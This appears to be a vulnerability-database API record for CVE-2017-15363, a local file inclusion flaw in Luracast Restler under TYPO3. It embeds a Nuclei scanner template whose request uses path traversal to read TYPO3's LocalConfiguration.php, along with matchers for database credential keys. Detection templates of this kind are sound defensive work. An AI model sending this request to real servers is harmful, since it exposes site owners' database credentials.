{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2017-15363/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2017-15363/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2017-15363/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2017-15363/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2017-15363/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2017-15363"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2017-15363"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2017/CVE-2017-15363.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2017-15363\n\ninfo:\n  name: Luracast Restler 3.0.1 via TYPO3 Restler 1.7.1 - Local File Inclusion\n  author: 0x_Akoko\n  severity: high\n  description: Luracast Restler 3.0.1 via TYPO3 Restler 1.7.1 is susceptible to local file inclusion in public/examples/resources/getsource.php. This could allow remote attackers to read arbitrary files via the file parameter.\n  impact: |\n    The vulnerability allows an attacker to include local files, potentially leading to unauthorized access or code execution.\n  remediation: |\n    Update to the latest version of Restler and TYPO3 to fix the vulnerability.\n  reference:\n    - https://www.exploit-db.com/exploits/42985\n    - https://extensions.typo3.org/extension/restler/\n    - https://extensions.typo3.org/extension/download/restler/1.7.1/zip/\n    - https://nvd.nist.gov/vuln/detail/CVE-2017-15363\n    - https://github.com/ARPSyndicate/kenzer-templates\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2017-15363\n    cwe-id: CWE-22\n    epss-score: 0.15333\n    epss-percentile: 0.96621\n    cpe: cpe:2.3:a:luracast:restler:*:*:*:*:*:typo3:*:*\n  metadata:\n    max-request: 1\n    vendor: luracast\n    product: restler\n    framework: typo3\n  tags: cve,cve2017,restler,lfi,edb,luracast,typo3,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"<?php\"\n          - \"'host'\"\n          - \"'database'\"\n          - \"'extConf'\"\n          - \"'debug'\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a0047304502206b300cc98ce7df6cc8385816e035b05064cae19b4318866e05e67287e7b82aa6022100f7e5bf16beefc23ddde1002af1ad396a0f1550fc7e2cf42f5b7c4ba6ef905004:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2017-15363"
}